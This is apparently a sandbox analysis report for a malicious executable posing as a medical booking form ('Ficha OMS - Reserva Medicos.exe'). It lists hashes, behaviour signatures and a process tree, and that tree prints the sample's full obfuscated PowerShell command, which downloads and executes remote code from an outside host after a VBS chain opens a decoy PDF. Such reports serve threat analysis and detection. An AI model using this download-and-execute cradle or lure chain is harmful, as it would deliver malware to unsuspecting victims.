Overview

overview

8

Static

static

Ficha OMS ...os.exe

windows7_x64

8

Ficha OMS ...os.exe

windows10_x64

5

Analysis

  • max time kernel
    148s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    12-07-2020 08:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Ficha OMS - Reserva Medicos.exe

  • Size

    703KB

  • MD5

    e6e25bc559a331c79f173920071e4f8e

  • SHA1

    ca4681b1f0f8fe4c2f8d142a85b08e56307a8f65

  • SHA256

    b5e39716f576e5ff21e945560a98ee7ca7309491b2b7f2643728cd341b9c19de

  • SHA512

    b3cd1b2da11bb8a7432e1451d9ff23a08145d0ace05fd7e99da11eeb6dddfd8039aed2b5e6087dc8027c0a2b7705761fe32347b4a2126c1e4c06cfb346279150

Score
8/10

Malware Config

Signatures

  • Blacklisted process makes network request 46 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 33 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Ficha OMS - Reserva Medicos.exe
    "C:\Users\Admin\AppData\Local\Temp\Ficha OMS - Reserva Medicos.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:532
      • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
        "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file1.pdf"
        3⤵
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        PID:1544
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file2.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1500
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C PoWErShElL -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('http://reservasbestco.com.br/final.jpg');$results
          4⤵
          • Suspicious use of WriteProcessMemory
          • An obfuscated cmd.exe command-line is typically used to evade detection.
          PID:1180
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            PoWErShElL -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('http://reservasbestco.com.br/final.jpg');$results
            5⤵
            • Blacklisted process makes network request
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            PID:1836

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\file1.pdf
    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\file2.vbs
    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs
    Download Submit
  • memory/532-2-0x0000000000000000-mapping.dmp
    Download
  • memory/532-7-0x00000000026C0000-0x00000000026C4000-memory.dmp
    Filesize

    16KB

    Download
  • memory/1180-8-0x0000000000000000-mapping.dmp
    Download
  • memory/1500-6-0x0000000000000000-mapping.dmp
    Download
  • memory/1544-4-0x0000000000000000-mapping.dmp
    Download
  • memory/1836-9-0x0000000000000000-mapping.dmp
    Download
  • memory/2040-0-0x0000000002430000-0x0000000002531000-memory.dmp
    Filesize

    1.0MB

    Download